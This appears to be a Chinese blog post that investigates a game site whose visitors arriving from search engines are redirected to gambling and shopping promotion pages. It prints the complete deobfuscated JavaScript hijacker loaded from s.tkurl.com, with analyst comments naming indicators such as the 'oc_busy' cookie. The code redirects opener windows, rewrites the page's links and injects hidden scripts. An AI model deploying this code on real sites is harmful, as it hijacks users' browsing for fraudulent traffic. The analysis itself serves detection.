昨天晚上打开flash.07073.com的时候会跳到一个博彩的网站。开始的时候并没在意，小游戏网广告多也算正常吧。后来发现只要是从Google搜索结果点过来的链接全部都会跳到这个博彩网站，偶尔还会跳到天猫、paipai、一号店，都是推广链接。
我开始还以为是Chrome又安装了恶意插件，检查一番确定不是浏览器问题，也不会是木马。难道是搜索页面劫持？
查看网站源码，在 /images/images.js 发现了判断 referrer 的代码。

这段代码很快就被删除了。但是我的浏览器从搜索引擎过去还会跳转到其他网站。继续找:

这里调用s.tkurl.com上的js:

s.tkurl.com/navigatoral.js 用 eval 的方式混淆（加密）了 JavaScript 代码：

解密后:
// Deobfuscated search-referrer hijacker (analyst annotation; code unchanged).
// Summary of what the visible code does: when the page was opened with an
// opener window AND document.referrer matches a list of search engines/portals,
// it navigates the opener (or, on legacy IE, the current page on unload) to
// an "s.tkurl.com/gomalls.html?..." landing URL, throttled by a cookie named
// "oc_busy". Indicators a defender can look for: the cookie name "oc_busy",
// the global "_5had0w", requests to s.tkurl.com, and a 0x0 absolutely
// positioned DIV appended to document.body at left:-100px.
if ("undefined" == typeof(_5had0w)) {
// Guard against double-injection: everything hangs off one global array used as a namespace.
_5had0w = [];
// Referrer allow-list for triggering. NOTE(review): the dots are not escaped,
// so "." matches any character; the list is effectively a loose substring
// match on the referrer host (e.g. "www.google.c" matches any google.* TLD).
_5had0w.ssite = new RegExp("(www.baidu.com)|(www.google.c)|(www.youdao.com)|(search.cn.yahoo.com)|(search.yahoo.com)|(114search.118114.cn)|(bing.118114.cn)|(search.114.vnet.cn)|(bing.com)|(soso.com)|(sososnap.com)|(sogou.com)|(so.360.cn)|(hao.360.cn)|(www.so.com)|(360webcache.com)|(gougou.com)|(www.gouwo.com)|(cache.baidu.com)|(m.baidu.com)|(baike.baidu.com)|(tieba.baidu.com)|(qzone.qq.com)|(t.qq.com)|(baidu.asp)|(hao123.com)|(265.com)|(114la.com)|(115.com)|(etao.com)", "i");
// The window whose location will be overwritten. Defaults to the current
// window; if the script runs inside a frame whose parent exposes `f` and an
// element with id "fulliframe", the parent window is targeted instead.
_5had0w.win = window;
try {
if (parent && parent.f && parent.document.getElementById("fulliframe")) {
_5had0w.win = parent
}
} catch(e) {}
// Cross-origin parent access throws; the empty catch keeps the default `window`.
_5had0w.host = _5had0w.win.location.host;
if (!_5had0w.host) _5had0w.host = "";
// Reads one cookie value by name from document.cookie; "" when absent.
_5had0w.getcookie = function(sName) {
var aCookie = document.cookie.split("; ");
for (var i = 0; i < aCookie.length; i++) {
var aCrumb = aCookie[i].split("=");
if (sName == aCrumb[0]) return unescape(aCrumb[1])
}
return ""
};
// Writes the throttle cookie "oc_busy" with a 6-minute expiry on path "/".
// `date` is assigned without `var`, so it leaks as an implicit global.
_5had0w.setcookie = function(sValue) {
date = new Date();
date.setMinutes(date.getMinutes() + 6);
document.cookie = "oc_busy=" + escape(sValue) + "; expires=" + date.toGMTString() + ";path=/"
};
// Char code of the first character of the host (with a leading www./blog./bbs.
// removed). Computed here but not referenced anywhere else in this listing.
_5had0w.hcode = _5had0w.host.replace(/(www|blog|bbs)\./ig, "").charCodeAt(0);
if (isNaN(_5had0w.hcode)) _5had0w.hcode = 0;
// Landing URL, assembled from string fragments at runtime — presumably to
// defeat simple string matching on the source. Joined value:
// http://s.tkurl.com/gomalls.html?
_5had0w.mall = "htt" + "p://s.t" + "kur" + "l.c" + "om/gom" + "alls.ht" + "ml?";
// Captured once at load; the month/day are embedded in every landing URL as a campaign tag.
_5had0w.dd = new Date();
// Legacy-IE path (document.attachEvent present): fires on window unload and
// opens the "p0<month><day>.html" variant via the element created in nvPower.
// NOTE(review): launchURL is not a standard DOM method; presumably an
// IE-specific behavior of the element created with createElement("") — verify.
_5had0w.powerboom = function() {
try {
var urlp = _5had0w.mall + "p0" + (_5had0w.dd.getMonth() + 1) + "" + _5had0w.dd.getDate() + ".html";
if (document.attachEvent) {
_5had0w.pnode.launchURL(urlp);
_5had0w.pnode = null;
self.focus()
}
} catch(e) {}
};
// Arms the unload handler above (legacy IE only).
_5had0w.nvPower = function() {
try {
if (document.attachEvent) {
_5had0w.pnode = document.createElement("");
window.attachEvent("onunload", _5had0w.powerboom)
}
} catch(e) {}
};
// Disarms the unload handler so a deliberate redirect (nvEnter) is not followed by a second one.
_5had0w.detachPower = function() {
try {
if (window.detachEvent) {
_5had0w.pnode = null;
window.detachEvent("onunload", _5had0w.powerboom)
}
} catch(e) {}
};
// Redirects the targeted window itself to the "e0<month><day>.html" variant,
// marking the throttle cookie first.
_5had0w.nvEnter = function() {
_5had0w.detachPower();
_5had0w.setcookie("_mall");
_5had0w.win.location = _5had0w.mall + "e0" + (_5had0w.dd.getMonth() + 1) + "" + _5had0w.dd.getDate() + ".html"
};
// Installed as onclick on every link (see oload): returns true so the link
// still opens (in a new tab, because target is set to "_blank" there), then
// 1.5 s later the tab the user left behind is redirected via nvEnter.
_5had0w.shadowClick = function() {
setTimeout(_5had0w.nvEnter, 1500);
return true
};
// "no power": set when none of the opener-redirect attempts succeeded and the
// script fell back to the unload/link-rewrite path.
_5had0w.np = false;
// Tries, in order, to navigate the opener window (location, navigate(),
// opener.opener.navigate()); each attempt is expected to throw cross-origin.
// If all fail, arms the IE unload path and sets np so oload rewrites links.
_5had0w.nvIt = function(lochref) {
try {
_5had0w.win.opener.location = lochref
} catch(e) {
try {
_5had0w.win.opener.navigate(lochref)
} catch(e2) {
try {
_5had0w.win.opener.opener.navigate(lochref)
} catch(e3) {
_5had0w.nvPower();
_5had0w.np = true
}
}
}
};
// Throttle: only fire when "oc_busy" is absent or does not yet contain "mall";
// setcookie's 6-minute expiry bounds how often this repeats per browser.
_5had0w.nvUrl = function() {
var _co = _5had0w.getcookie("oc_busy");
if (_co == "" || _co.indexOf("mall") < 0) {
_5had0w.nvIt(_5had0w.mall + "n0" + (_5had0w.dd.getMonth() + 1) + "" + _5had0w.dd.getDate() + ".html");
if (!_5had0w.np) {
_5had0w.setcookie(_co + "_mall")
}
}
};
// Trigger condition: the page must have an opener window AND the referrer must
// match the search-engine list. Direct visits (no matching referrer) see nothing,
// which is why the behavior only shows up when arriving from search results.
if (_5had0w.win.opener) {
if (_5had0w.ssite.test(_5had0w.win.document.referrer)) {
_5had0w.nvUrl()
}
}
// Injects arbitrary HTML into an off-screen 0x0 DIV (detection point: an
// absolutely positioned DIV at left:-100px appended to body).
_5had0w.appendChild = function(html) {
var node = document.createElement("DIV");
node.style.width = "0";
node.style.height = "0";
node.style.position = "absolute";
node.style.left = "-100px";
node.innerHTML = html;
document.body.appendChild(node)
};
// Same hidden-DIV technique, but appends one <script src=...> per argument.
// Not called anywhere in this listing.
_5had0w.appendScript = function() {
if (1 > arguments.length) return;
var node = document.createElement("DIV");
node.style.width = "0";
node.style.height = "0";
node.style.position = "absolute";
node.style.left = "-100px";
for (var i = 0; i < arguments.length; i++) node.appendChild(document.createElement('script')).src = arguments[i];
document.body.appendChild(node)
};
// Load handler: polls until document.body exists, injects the hidden DIV, and
// on the fallback path (np) rewrites every non-"javascript:" link on the page.
_5had0w.oload = function() {
if (document.body == null) {
setTimeout(_5had0w.oload, 200)
} else {
// Flash object URL (http://s.tkurl.com/broadp.swf) and its parameters
// (d=<first host char>, b=ff on non-IE/Opera). Both are built but `str`
// below is empty — the markup that used them may have been lost when the
// listing was rendered; verify against the original script.
var fp = "htt" + "p://s.t" + "kur" + "l.c" + "om/bro" + "adp.s" + "wf";
var pm = "d=" + _5had0w.host.replace(/(www|blog|bbs)\./ig, "").charAt(0);
try {
if ((!document.attachEvent) || navigator.userAgent.indexOf("Opera") > -1) {
pm += "&b=ff"
}
} catch(e) {}
var str = '';
_5had0w.appendChild(str);
if (_5had0w.np) {
var ls = document.links;
if (ls.length && ls.length > 0) {
for (var i = 0; i < ls.length; i++) {
// Every link now opens in a new tab and schedules a redirect of this tab.
if (ls[i].href.indexOf("javascript") < 0) {
ls[i].target = "_blank";
ls[i].onclick = _5had0w.shadowClick
}
}
}
}
}
};
// Register oload on page load (IE attachEvent or standard addEventListener).
try {
if (document.attachEvent) {
window.attachEvent("onload", _5had0w.oload)
} else {
window.addEventListener("load", _5had0w.oload, false)
}
} catch(e) {}
}
没必要故意这么做吧?
本文结束。



